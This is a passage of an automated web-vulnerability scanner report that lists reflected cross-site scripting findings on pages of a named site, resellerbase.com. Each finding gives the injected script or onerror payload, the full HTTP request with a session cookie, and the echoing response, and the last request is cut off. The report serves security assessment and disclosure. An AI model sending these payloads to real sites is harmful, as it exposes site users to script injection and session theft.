This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/googlepr.php/7b306<img%20src%3da%20onerror%3dalert(1)>a0301be902b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:00:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9804

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: googl
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : googlepr.php/7b306<img src=a onerror=alert(1)>a0301be902b]</td>
...[SNIP]...

2.4282. http://www.resellerbase.com/tag/googlepr.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/googlepr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as text between TITLE tags. The payload 97d21</title><img%20src%3da%20onerror%3dalert(1)>ed8013cf980 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 97d21</title><img src=a onerror=alert(1)>ed8013cf980 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/googlepr.php/97d21</title><img%20src%3da%20onerror%3dalert(1)>ed8013cf980 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:00:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9820

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: googlepr.php/97d21</title><img src=a onerror=alert(1)>ed8013cf980</title>
...[SNIP]...

2.4283. http://www.resellerbase.com/tag/googlepr.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/googlepr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as text between TITLE tags. The payload 95c49</title><img%20src%3da%20onerror%3dalert(1)>02217416ad4d15bf6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 95c49</title><img src=a onerror=alert(1)>02217416ad4d15bf6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/googlepr.php/95c49</title><img%20src%3da%20onerror%3dalert(1)>02217416ad4d15bf6?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/googlepr.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9832

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: googlepr.php/95c49</title><img src=a onerror=alert(1)>02217416ad4d15bf6</title>
...[SNIP]...

2.4284. http://www.resellerbase.com/tag/googlepr.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/googlepr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 11efe<img%20src%3da%20onerror%3dalert(1)>21e6cfcd6d5617f55 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 11efe<img src=a onerror=alert(1)>21e6cfcd6d5617f55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/googlepr.php/11efe<img%20src%3da%20onerror%3dalert(1)>21e6cfcd6d5617f55?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/googlepr.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9816

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: googl
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : googlepr.php/11efe<img src=a onerror=alert(1)>21e6cfcd6d5617f55]</td>
...[SNIP]...

2.4285. http://www.resellerbase.com/tag/host [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/host

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c4050<script>alert(1)</script>36d4281c3ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagc4050<script>alert(1)</script>36d4281c3ef/host HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/fatcow-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:55:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagc4050<script>alert(1)</script>36d4281c3ef/host was not found on this server.</p>
...[SNIP]...

2.4286. http://www.resellerbase.com/tag/host [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/host

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload adef1<script>alert(1)</script>0d03676561d8d8872 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tagadef1<script>alert(1)</script>0d03676561d8d8872/host?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/host
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:56:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagadef1<script>alert(1)</script>0d03676561d8d8872/host?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4287. http://www.resellerbase.com/tag/host [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/host

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 5dc5c</title><img%20src%3da%20onerror%3dalert(1)>ae6500625b289c63e was submitted in the REST URL parameter 2. This input was echoed as 5dc5c</title><img src=a onerror=alert(1)>ae6500625b289c63e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/host5dc5c</title><img%20src%3da%20onerror%3dalert(1)>ae6500625b289c63e?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/host
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9814

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: host5dc5c</title><img src=a onerror=alert(1)>ae6500625b289c63e</title>
...[SNIP]...

2.4288. http://www.resellerbase.com/tag/host [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/host

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 28627</title><img%20src%3da%20onerror%3dalert(1)>698e8cc0a35 was submitted in the REST URL parameter 2. This input was echoed as 28627</title><img src=a onerror=alert(1)>698e8cc0a35 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/host28627</title><img%20src%3da%20onerror%3dalert(1)>698e8cc0a35 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/fatcow-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: host28627</title><img src=a onerror=alert(1)>698e8cc0a35</title>
...[SNIP]...

2.4289. http://www.resellerbase.com/tag/host [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/host

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 87b1a<img%20src%3da%20onerror%3dalert(1)>df2c67f961a2da4c3 was submitted in the REST URL parameter 2. This input was echoed as 87b1a<img src=a onerror=alert(1)>df2c67f961a2da4c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/host87b1a<img%20src%3da%20onerror%3dalert(1)>df2c67f961a2da4c3?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/host
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9798

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: host8
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : host87b1a<img src=a onerror=alert(1)>df2c67f961a2da4c3]</td>
...[SNIP]...

2.4290. http://www.resellerbase.com/tag/host [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/host

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 23923<img%20src%3da%20onerror%3dalert(1)>ce491d9ef26 was submitted in the REST URL parameter 2. This input was echoed as 23923<img src=a onerror=alert(1)>ce491d9ef26 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/host23923<img%20src%3da%20onerror%3dalert(1)>ce491d9ef26 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/fatcow-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:55:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: host2
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : host23923<img src=a onerror=alert(1)>ce491d9ef26]</td>
...[SNIP]...

2.4291. http://www.resellerbase.com/tag/hosting [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/hosting

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e29e1<script>alert(1)</script>7db36f91329300533 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tage29e1<script>alert(1)</script>7db36f91329300533/hosting?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/hosting
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:56:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tage29e1<script>alert(1)</script>7db36f91329300533/hosting?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4292. http://www.resellerbase.com/tag/hosting [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/hosting

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 941e7<script>alert(1)</script>6ade4f61cd5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag941e7<script>alert(1)</script>6ade4f61cd5/hosting HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/fatcow-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:55:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag941e7<script>alert(1)</script>6ade4f61cd5/hosting was not found on this server.</p>
...[SNIP]...

2.4293. http://www.resellerbase.com/tag/hosting [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/hosting

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 49388</title><img%20src%3da%20onerror%3dalert(1)>cf20de4afe4 was submitted in the REST URL parameter 2. This input was echoed as 49388</title><img src=a onerror=alert(1)>cf20de4afe4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/hosting49388</title><img%20src%3da%20onerror%3dalert(1)>cf20de4afe4 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/fatcow-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:55:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: hosting49388</title><img src=a onerror=alert(1)>cf20de4afe4</title>
...[SNIP]...

2.4294. http://www.resellerbase.com/tag/hosting [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/hosting

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 872e8<img%20src%3da%20onerror%3dalert(1)>f7ca7a9bd63e69e4b was submitted in the REST URL parameter 2. This input was echoed as 872e8<img src=a onerror=alert(1)>f7ca7a9bd63e69e4b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/hosting872e8<img%20src%3da%20onerror%3dalert(1)>f7ca7a9bd63e69e4b?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/hosting
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9804

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: hosti
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : hosting872e8<img src=a onerror=alert(1)>f7ca7a9bd63e69e4b]</td>
...[SNIP]...

2.4295. http://www.resellerbase.com/tag/hosting [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/hosting

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 18a34<img%20src%3da%20onerror%3dalert(1)>1de6157cd1 was submitted in the REST URL parameter 2. This input was echoed as 18a34<img src=a onerror=alert(1)>1de6157cd1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/hosting18a34<img%20src%3da%20onerror%3dalert(1)>1de6157cd1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/fatcow-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:55:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: hosti
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : hosting18a34<img src=a onerror=alert(1)>1de6157cd1]</td>
...[SNIP]...

2.4296. http://www.resellerbase.com/tag/hosting [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/hosting

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload a3f6c</title><img%20src%3da%20onerror%3dalert(1)>d365e3542eca3cfaf was submitted in the REST URL parameter 2. This input was echoed as a3f6c</title><img src=a onerror=alert(1)>d365e3542eca3cfaf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/hostinga3f6c</title><img%20src%3da%20onerror%3dalert(1)>d365e3542eca3cfaf?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/hosting
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9820

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: hostinga3f6c</title><img src=a onerror=alert(1)>d365e3542eca3cfaf</title>
...[SNIP]...

2.4297. http://www.resellerbase.com/tag/hotel [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/hotel

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 886e7<script>alert(1)</script>4552894263f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag886e7<script>alert(1)</script>4552894263f/hotel HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:56:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag886e7<script>alert(1)</script>4552894263f/hotel was not found on this server.</p>
...[SNIP]...

2.4298. http://www.resellerbase.com/tag/hotel [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/hotel

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2bef0<script>alert(1)</script>affc5111a192e5fa8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag2bef0<script>alert(1)</script>affc5111a192e5fa8/hotel?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
